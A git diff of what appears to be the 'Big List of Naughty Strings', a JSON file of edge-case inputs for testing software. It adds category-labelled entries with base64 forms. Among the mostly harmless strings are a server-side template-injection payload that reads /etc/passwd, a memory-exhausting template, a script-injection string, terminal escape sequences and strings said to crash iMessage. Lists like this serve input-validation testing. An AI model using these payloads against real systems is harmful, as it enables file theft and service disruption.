+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "shitake mushrooms",
+ "base64": "c2hpdGFrZSBtdXNocm9vbXM="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "RomansInSussex.co.uk",
+ "base64": "Um9tYW5zSW5TdXNzZXguY28udWs="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "http://www.cum.qc.ca/",
+ "base64": "aHR0cDovL3d3dy5jdW0ucWMuY2Ev"
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "Craig Cockburn, Software Specialist",
+ "base64": "Q3JhaWcgQ29ja2J1cm4sIFNvZnR3YXJlIFNwZWNpYWxpc3Q="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "Linda Callahan",
+ "base64": "TGluZGEgQ2FsbGFoYW4="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "Dr. Herman I. Libshitz",
+ "base64": "RHIuIEhlcm1hbiBJLiBMaWJzaGl0eg=="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "magna cum laude",
+ "base64": "bWFnbmEgY3VtIGxhdWRl"
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "Super Bowl XXX",
+ "base64": "U3VwZXIgQm93bCBYWFg="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "medieval erection of parapets",
+ "base64": "bWVkaWV2YWwgZXJlY3Rpb24gb2YgcGFyYXBldHM="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "evaluate",
+ "base64": "ZXZhbHVhdGU="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "mocha",
+ "base64": "bW9jaGE="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "expression",
+ "base64": "ZXhwcmVzc2lvbg=="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "Arsenal canal",
+ "base64": "QXJzZW5hbCBjYW5hbA=="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "classic",
+ "base64": "Y2xhc3NpYw=="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "Tyson Gay",
+ "base64": "VHlzb24gR2F5"
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "Dick Van Dyke",
+ "base64": "RGljayBWYW4gRHlrZQ=="
+ },
+ {
+ "category": "Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)",
+ "string": "basement",
+ "base64": "YmFzZW1lbnQ="
+ },
+ {
+ "category": "Strings which may cause human to reinterpret worldview",
+ "string": "If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you.",
+ "base64": "SWYgeW91J3JlIHJlYWRpbmcgdGhpcywgeW91J3ZlIGJlZW4gaW4gYSBjb21hIGZvciBhbG1vc3QgMjAgeWVhcnMgbm93LiBXZSdyZSB0cnlpbmcgYSBuZXcgdGVjaG5pcXVlLiBXZSBkb24ndCBrbm93IHdoZXJlIHRoaXMgbWVzc2FnZSB3aWxsIGVuZCB1cCBpbiB5b3VyIGRyZWFtLCBidXQgd2UgaG9wZSBpdCB3b3Jrcy4gUGxlYXNlIHdha2UgdXAsIHdlIG1pc3MgeW91Lg=="
+ },
+ {
+ "category": "Strings which punish the fools who use cat/type on this file",
+ "string": "Roses are \u001b[0;31mred\u001b[0m, violets are \u001b[0;34mblue. Hope you enjoy terminal hue",
+ "base64": "Um9zZXMgYXJlIBtbMDszMW1yZWQbWzBtLCB2aW9sZXRzIGFyZSAbWzA7MzRtYmx1ZS4gSG9wZSB5b3UgZW5qb3kgdGVybWluYWwgaHVl"
+ },
+ {
+ "category": "Strings which punish the fools who use cat/type on this file",
+ "string": "But now...\u001b[20Cfor my greatest trick...\u001b[8m",
+ "base64": "QnV0IG5vdy4uLhtbMjBDZm9yIG15IGdyZWF0ZXN0IHRyaWNrLi4uG1s4bQ=="
+ },
+ {
+ "category": "Strings which punish the fools who use cat/type on this file",
+ "string": "The quic\b\b\b\b\b\bk brown fo\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007\u0007x... [Beeeep]",
+ "base64": "VGhlIHF1aWMICAgICAhrIGJyb3duIGZvBwcHBwcHBwcHBwd4Li4uIFtCZWVlZXBd"
+ },
+ {
+ "category": "Strings which crashed iMessage in various versions of iOS",
+ "string": "Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗",
+ "base64": "UG93ZXLZhNmP2YTZj9i12ZHYqNmP2YTZj9mE2LXZkdio2Y/Ysdix2Ysg4KWjIOClo2gg4KWjIOClo+WGlw=="
+ },
+ {
+ "category": "Strings which crashed iMessage in various versions of iOS",
+ "string": "🏳0🌈️",
+ "base64": "8J+PszDwn4yI77iP"
+ },
+ {
+ "category": "Strings which crashed iMessage in various versions of iOS",
+ "string": "జ్ఞా",
+ "base64": "4LCc4LGN4LCe4oCM4LC+"
+ },
+ {
+ "category": "This is a four characters string which includes Persian special characters (گچپژ)",
+ "string": "گچپژ",
+ "base64": "2q/ahtm+2pg="
+ },
+ {
+ "category": "second, obviously, prints contents of /etc/passwd",
+ "string": "{% print 'x' * 64 * 1024**3 %}",
+ "base64": "eyUgcHJpbnQgJ3gnICogNjQgKiAxMDI0KiozICV9"
+ },
+ {
+ "category": "second, obviously, prints contents of /etc/passwd",
+ "string": "{{ \"\".__class__.__mro__[2].__subclasses__()[40](\"/etc/passwd\").read() }}",
+ "base64": "e3sgIiIuX19jbGFzc19fLl9fbXJvX19bMl0uX19zdWJjbGFzc2VzX18oKVs0MF0oIi9ldGMvcGFzc3dkIikucmVhZCgpIH19"
+ }
+]
\ No newline at end of file
diff --git a/blns.json b/blns.json
index bfb195f..d1637ee 100644
--- a/blns.json
+++ b/blns.json
@@ -1,517 +1,2062 @@
[
- "",
- "undefined",
- "undef",
- "null",
- "NULL",
- "(null)",
- "nil",
- "NIL",
- "true",
- "false",
- "True",
- "False",
- "TRUE",
- "FALSE",
- "None",
- "hasOwnProperty",
- "then",
- "\\",
- "\\\\",
- "0",
- "1",
- "1.00",
- "$1.00",
- "1/2",
- "1E2",
- "1E02",
- "1E+02",
- "-1",
- "-1.00",
- "-$1.00",
- "-1/2",
- "-1E2",
- "-1E02",
- "-1E+02",
- "1/0",
- "0/0",
- "-2147483648/-1",
- "-9223372036854775808/-1",
- "-0",
- "-0.0",
- "+0",
- "+0.0",
- "0.00",
- "0..0",
- ".",
- "0.0.0",
- "0,00",
- "0,,0",
- ",",
- "0,0,0",
- "0.0/0",
- "1.0/0.0",
- "0.0/0.0",
- "1,0/0,0",
- "0,0/0,0",
- "--1",
- "-",
- "-.",
- "-,",
- "999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999",
- "NaN",
- "Infinity",
- "-Infinity",
- "INF",
- "1#INF",
- "-1#IND",
- "1#QNAN",
- "1#SNAN",
- "1#IND",
- "0x0",
- "0xffffffff",
- "0xffffffffffffffff",
- "0xabad1dea",
- "123456789012345678901234567890123456789",
- "1,000.00",
- "1 000.00",
- "1'000.00",
- "1,000,000.00",
- "1 000 000.00",
- "1'000'000.00",
- "1.000,00",
- "1 000,00",
- "1'000,00",
- "1.000.000,00",
- "1 000 000,00",
- "1'000'000,00",
- "01000",
- "08",
- "09",
- "2.2250738585072011e-308",
- ",./;'[]\\-=",
- "<>?:\"{}|_+",
- "!@#$%^&*()`~",
- "\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b\u000e\u000f\u0010\u0011\u0012\u0013\u0014\u0015\u0016\u0017\u0018\u0019\u001a\u001b\u001c\u001d\u001e\u001f",
- "",
- "\t\u000b\f
",
- "",
- "",
- "",
- "Ω≈ç√∫˜µ≤≥÷",
- "åß∂ƒ©˙∆˚¬…æ",
- "œ∑´®†¥¨ˆøπ“‘",
- "¡™£¢∞§¶•ªº–≠",
- "¸˛Ç◊ı˜Â¯˘¿",
- "ÅÍÎÏ˝ÓÔÒÚÆ☃",
- "Œ„´‰ˇÁ¨ˆØ∏”’",
- "`⁄€‹›fifl‡°·‚—±",
- "⅛⅜⅝⅞",
- "ЁЂЃЄЅІЇЈЉЊЋЌЍЎЏАБВГДЕЖЗИЙКЛМНОПРСТУФХЦЧШЩЪЫЬЭЮЯабвгдежзийклмнопрстуфхцчшщъыьэюя",
- "٠١٢٣٤٥٦٧٨٩",
- "⁰⁴⁵",
- "₀₁₂",
- "⁰⁴⁵₀₁₂",
- "ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็ ด้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็็้้้้้้้้็็็็็้้้้้็็็็",
- "'",
- "\"",
- "''",
- "\"\"",
- "'\"'",
- "\"''''\"'\"",
- "\"'\"'\"''''\"",
- "
",
- "
",
- "
",
- "
",
- "田中さんにあげて下さい",
- "パーティーへ行かないか",
- "和製漢語",
- "部落格",
- "사회과학원 어학연구소",
- "찦차를 타고 온 펲시맨과 쑛다리 똠방각하",
- "社會科學院語學研究所",
- "울란바토르",
- "𠜎𠜱𠝹𠱓𠱸𠲖𠳏",
- "𐐜 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐙𐐊𐐡𐐝𐐓/𐐝𐐇𐐗𐐊𐐤𐐔 𐐒𐐋𐐗 𐐒𐐌 𐐜 𐐡𐐀𐐖𐐇𐐤𐐓𐐝 𐐱𐑂 𐑄 𐐔𐐇𐐝𐐀𐐡𐐇𐐓 𐐏𐐆𐐅𐐤𐐆𐐚𐐊𐐡𐐝𐐆𐐓𐐆",
- "表ポあA鷗ŒéB逍Üߪąñ丂㐀𠀀",
- "Ⱥ",
- "Ⱦ",
- "ヽ༼ຈل͜ຈ༽ノ ヽ༼ຈل͜ຈ༽ノ",
- "(。◕ ∀ ◕。)",
- "`ィ(´∀`∩",
- "__ロ(,_,*)",
- "・( ̄∀ ̄)・:*:",
- "゚・✿ヾ╲(。◕‿◕。)╱✿・゚",
- ",。・:*:・゜’( ☻ ω ☻ )。・:*:・゜’",
- "(╯°□°)╯︵ ┻━┻)",
- "(ノಥ益ಥ)ノ ┻━┻",
- "┬─┬ノ( º _ ºノ)",
- "( ͡° ͜ʖ ͡°)",
- "¯\\_(ツ)_/¯",
- "😍",
- "👩🏽",
- "👨🦰 👨🏿🦰 👨🦱 👨🏿🦱 🦹🏿♂️",
- "👾 🙇 💁 🙅 🙆 🙋 🙎 🙍",
- "🐵 🙈 🙉 🙊",
- "❤️ 💔 💌 💕 💞 💓 💗 💖 💘 💝 💟 💜 💛 💚 💙",
- "✋🏿 💪🏿 👐🏿 🙌🏿 👏🏿 🙏🏿",
- "👨👩👦 👨👩👧👦 👨👨👦 👩👩👧 👨👦 👨👧👦 👩👦 👩👧👦",
- "🚾 🆒 🆓 🆕 🆖 🆗 🆙 🏧",
- "0️⃣ 1️⃣ 2️⃣ 3️⃣ 4️⃣ 5️⃣ 6️⃣ 7️⃣ 8️⃣ 9️⃣ 🔟",
- "🇺🇸🇷🇺🇸 🇦🇫🇦🇲🇸",
- "🇺🇸🇷🇺🇸🇦🇫🇦🇲",
- "🇺🇸🇷🇺🇸🇦",
- "123",
- "١٢٣",
- "ثم نفس سقطت وبالتحديد،, جزيرتي باستخدام أن دنو. إذ هنا؟ الستار وتنصيب كان. أهّل ايطاليا، بريطانيا-فرنسا قد أخذ. سليمان، إتفاقية بين ما, يذكر الحدود أي بعد, معاملة بولندا، الإطلاق عل إيو.",
- "בְּרֵאשִׁית, בָּרָא אֱלֹהִים, אֵת הַשָּׁמַיִם, וְאֵת הָאָרֶץ",
- "הָיְתָהtestالصفحات التّحول",
- "﷽",
- "ﷺ",
- "مُنَاقَشَةُ سُبُلِ اِسْتِخْدَامِ اللُّغَةِ فِي النُّظُمِ الْقَائِمَةِ وَفِيم يَخُصَّ التَّطْبِيقَاتُ الْحاسُوبِيَّةُ، ",
- "᚛ᚄᚓᚐᚋᚒᚄ ᚑᚄᚂᚑᚏᚅ᚜",
- "᚛ ᚜",
- "test",
- "test",
- "
test
",
- "testtest",
- "test",
- "Ṱ̺̺̕o͞ ̷i̲̬͇̪͙n̝̗͕v̟̜̘̦͟o̶̙̰̠kè͚̮̺̪̹̱̤ ̖t̝͕̳̣̻̪͞h̼͓̲̦̳̘̲e͇̣̰̦̬͎ ̢̼̻̱̘h͚͎͙̜̣̲ͅi̦̲̣̰̤v̻͍e̺̭̳̪̰-m̢iͅn̖̺̞̲̯̰d̵̼̟͙̩̼̘̳ ̞̥̱̳̭r̛̗̘e͙p͠r̼̞̻̭̗e̺̠̣͟s̘͇̳͍̝͉e͉̥̯̞̲͚̬͜ǹ̬͎͎̟̖͇̤t͍̬̤͓̼̭͘ͅi̪̱n͠g̴͉ ͏͉ͅc̬̟h͡a̫̻̯͘o̫̟̖͍̙̝͉s̗̦̲.̨̹͈̣",
- "̡͓̞ͅI̗̘̦͝n͇͇͙v̮̫ok̲̫̙͈i̖͙̭̹̠̞n̡̻̮̣̺g̲͈͙̭͙̬͎ ̰t͔̦h̞̲e̢̤ ͍̬̲͖f̴̘͕̣è͖ẹ̥̩l͖͔͚i͓͚̦͠n͖͍̗͓̳̮g͍ ̨o͚̪͡f̘̣̬ ̖̘͖̟͙̮c҉͔̫͖͓͇͖ͅh̵̤̣͚͔á̗̼͕ͅo̼̣̥s̱͈̺̖̦̻͢.̛̖̞̠̫̰",
- "̗̺͖̹̯͓Ṯ̤͍̥͇͈h̲́e͏͓̼̗̙̼̣͔ ͇̜̱̠͓͍ͅN͕͠e̗̱z̘̝̜̺͙p̤̺̹͍̯͚e̠̻̠͜r̨̤͍̺̖͔̖̖d̠̟̭̬̝͟i̦͖̩͓͔̤a̠̗̬͉̙n͚͜ ̻̞̰͚ͅh̵͉i̳̞v̢͇ḙ͎͟-҉̭̩̼͔m̤̭̫i͕͇̝̦n̗͙ḍ̟ ̯̲͕͞ǫ̟̯̰̲͙̻̝f ̪̰̰̗̖̭̘͘c̦͍̲̞͍̩̙ḥ͚a̮͎̟̙͜ơ̩̹͎s̤.̝̝ ҉Z̡̖̜͖̰̣͉̜a͖̰͙̬͡l̲̫̳͍̩g̡̟̼̱͚̞̬ͅo̗͜.̟",
- "̦H̬̤̗̤͝e͜ ̜̥̝̻͍̟́w̕h̖̯͓o̝͙̖͎̱̮ ҉̺̙̞̟͈W̷̼̭a̺̪͍į͈͕̭͙̯̜t̶̼̮s̘͙͖̕ ̠̫̠B̻͍͙͉̳ͅe̵h̵̬͇̫͙i̹͓̳̳̮͎̫̕n͟d̴̪̜̖ ̰͉̩͇͙̲͞ͅT͖̼͓̪͢h͏͓̮̻e̬̝̟ͅ ̤̹̝W͙̞̝͔͇͝ͅa͏͓͔̹̼̣l̴͔̰̤̟͔ḽ̫.͕",
- "Z̮̞̠͙͔ͅḀ̗̞͈̻̗Ḷ͙͎̯̹̞͓G̻O̭̗̮",
- "˙ɐnbᴉlɐ ɐuƃɐɯ ǝɹolop ʇǝ ǝɹoqɐl ʇn ʇunpᴉpᴉɔuᴉ ɹodɯǝʇ poɯsnᴉǝ op pǝs 'ʇᴉlǝ ƃuᴉɔsᴉdᴉpɐ ɹnʇǝʇɔǝsuoɔ 'ʇǝɯɐ ʇᴉs ɹolop ɯnsdᴉ ɯǝɹo˥",
- "00˙Ɩ$-",
- "The quick brown fox jumps over the lazy dog",
- "𝐓𝐡𝐞 𝐪𝐮𝐢𝐜𝐤 𝐛𝐫𝐨𝐰𝐧 𝐟𝐨𝐱 𝐣𝐮𝐦𝐩𝐬 𝐨𝐯𝐞𝐫 𝐭𝐡𝐞 𝐥𝐚𝐳𝐲 𝐝𝐨𝐠",
- "𝕿𝖍𝖊 𝖖𝖚𝖎𝖈𝖐 𝖇𝖗𝖔𝖜𝖓 𝖋𝖔𝖝 𝖏𝖚𝖒𝖕𝖘 𝖔𝖛𝖊𝖗 𝖙𝖍𝖊 𝖑𝖆𝖟𝖞 𝖉𝖔𝖌",
- "𝑻𝒉𝒆 𝒒𝒖𝒊𝒄𝒌 𝒃𝒓𝒐𝒘𝒏 𝒇𝒐𝒙 𝒋𝒖𝒎𝒑𝒔 𝒐𝒗𝒆𝒓 𝒕𝒉𝒆 𝒍𝒂𝒛𝒚 𝒅𝒐𝒈",
- "𝓣𝓱𝓮 𝓺𝓾𝓲𝓬𝓴 𝓫𝓻𝓸𝔀𝓷 𝓯𝓸𝔁 𝓳𝓾𝓶𝓹𝓼 𝓸𝓿𝓮𝓻 𝓽𝓱𝓮 𝓵𝓪𝔃𝔂 𝓭𝓸𝓰",
- "𝕋𝕙𝕖 𝕢𝕦𝕚𝕔𝕜 𝕓𝕣𝕠𝕨𝕟 𝕗𝕠𝕩 𝕛𝕦𝕞𝕡𝕤 𝕠𝕧𝕖𝕣 𝕥𝕙𝕖 𝕝𝕒𝕫𝕪 𝕕𝕠𝕘",
- "𝚃𝚑𝚎 𝚚𝚞𝚒𝚌𝚔 𝚋𝚛𝚘𝚠𝚗 𝚏𝚘𝚡 𝚓𝚞𝚖𝚙𝚜 𝚘𝚟𝚎𝚛 𝚝𝚑𝚎 𝚕𝚊𝚣𝚢 𝚍𝚘𝚐",
- "⒯⒣⒠ ⒬⒰⒤⒞⒦ ⒝⒭⒪⒲⒩ ⒡⒪⒳ ⒥⒰⒨⒫⒮ ⒪⒱⒠⒭ ⒯⒣⒠ ⒧⒜⒵⒴ ⒟⒪⒢",
- "",
- "<script>alert('123');</script>",
- "

",
- "